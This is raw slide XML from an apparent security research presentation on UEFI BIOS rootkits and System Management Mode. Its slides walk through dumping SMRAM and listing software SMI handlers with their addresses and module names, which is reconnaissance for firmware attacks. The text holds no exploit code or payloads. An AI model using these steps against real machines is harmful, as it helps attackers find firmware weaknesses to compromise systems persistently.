                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Due to the requested amount of memory (8388608 bytes), this command will take a while to execute.</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FE599"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Shape 494"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 1. Dumping SMRAM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Shape 495"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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500" name="Shape 500"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Shape 501"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651050" y="1559874"/>
            <a:ext cx="9682200" cy="471630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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Use the smram_parse.py script to analyze the SMI handlers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SW SMI HANDLERS:</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd465c10: SMI = 0x28, addr = 0xbd463a3c, image = PowerMgmtSmm</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd59dc10: SMI = 0x56, addr = 0xbd59bb14, image = CpuSpSMI</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd59db10: SMI = 0x57, addr = 0xbd59bc88, image = CpuSpSMI</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd541d10: SMI = 0x62, addr = 0xbd574004, image = GenericComponentSmmEntry *</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd541b10: SMI = 0x65, addr = 0xbd575024, image = GenericComponentSmmEntry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>*</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd541a10: SMI = 0x63, addr = 0xbd5753a0, image = GenericComponentSmmEntry *</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd541910: SMI = 0x64, addr = 0xbd575a18, image = GenericComponentSmmEntry *</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd541810: SMI = 0xb2, addr = 0xbd575fa4, image = GenericComponentSmmEntry *</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd541110: SMI = 0xb0, addr = 0xbd537c28, image = NbSmi</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd542910: SMI = 0xbb, addr = 0xbd52ed04, image = SbRunSmm</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd542210: SMI = 0xa0, addr = 0xbd525ce4, image = AcpiModeEnable</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd542010: SMI = 0xa1, addr = 0xbd525dd0, image = AcpiModeEnable</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd524b10: SMI = 0x55, addr = 0xbd5114d0, image = SmramSaveInfoHandlerSmm</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd4e6a10: SMI = 0x43, addr = 0xbd4e5360, image = AhciInt13Smm *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd4e6810: SMI = 0x44, addr = 0xbd4e07bc, image = MicrocodeUpdate *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd4e6610: SMI = 0x41, addr = 0xbd4dc9b8, image = OA3_SMM *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd4e6510: SMI = 0xdf, addr = 0xbd4dab54, image = OA3_SMM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Shape 502"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 2. Looking for available SMI handlers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Shape 503"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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508" name="Shape 508"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="509" name="Shape 509"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651039" y="1568933"/>
            <a:ext cx="9682200" cy="4469400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd4e6410: SMI = 0xef, addr = 0xbd4d89e0, image = SmiVariable</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd4e6310: SMI = 0x90, addr = 0xbd4d42dc, image = BiosDataRecordSmi *</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd4cec10: SMI = 0x61, addr = 0xbd4cfde0, image = CmosSmm</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd4ce510: SMI = 0x42, addr = 0xbd4c4cd0, image = NvmeSmm</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd4ce110: SMI = 0x26, addr = 0xbd4ac32c, image = Ofbd *</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd497c10: SMI = 0x20, addr = 0xbd4929bc, image = SmiFlash *</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd497b10: SMI = 0x21, addr = 0xbd4929bc, image = SmiFlash *</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd497a10: SMI = 0x22, addr = 0xbd4929bc, image = SmiFlash *</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd497910: SMI = 0x23, addr = 0xbd4929bc, image = SmiFlash *</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd497810: SMI = 0x24, addr = 0xbd4929bc, image = SmiFlash *</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd497710: SMI = 0x25, addr = 0xbd4929bc, image = SmiFlash *</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd497410: SMI = 0x35, addr = 0xbd48fe24, image = TcgSmm</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EFEFEF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd472f10: SMI = 0x31, addr = 0xbd474ca8, image = UsbRtSmm</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd472b10: SMI = 0xbf, addr = 0xbd46ea48, image = CrbSmi</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd472710: SMI = 0x01, addr = 0xbd46d5e0, image = PiSmmCommunicationSmm</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd472010: SMI = 0x50, addr = 0xbd4671d4, image = SmbiosDmiEdit</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd465f10: SMI = 0x51, addr = 0xbd4671d4, image = SmbiosDmiEdit</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd465e10: SMI = 0x52, addr = 0xbd4671d4, image = SmbiosDmiEdit</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Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>0xbd465d10: SMI = 0x53, addr = 0xbd4671d4, image = SmbiosDmiEdit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Shape 510"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 2. Looking for available SMI handlers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Shape 511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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286" name="Shape 286"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Shape 287"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4235040" cy="6856920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="76B72A"/>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8" name="Shape 288"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3171600"/>
            <a:ext cx="4235040" cy="513360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="34200" lIns="68400" rIns="68400" wrap="square" tIns="34200">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Shape 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4651560" y="1542600"/>
            <a:ext cx="6807600" cy="4596840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Intro. UEFI BIOS rootkits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>System Management Mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Preliminary stage of the research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Intel Direct Connect Interface overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Using Intel Direct Connect Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-184399" lvl="0" marL="540000" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
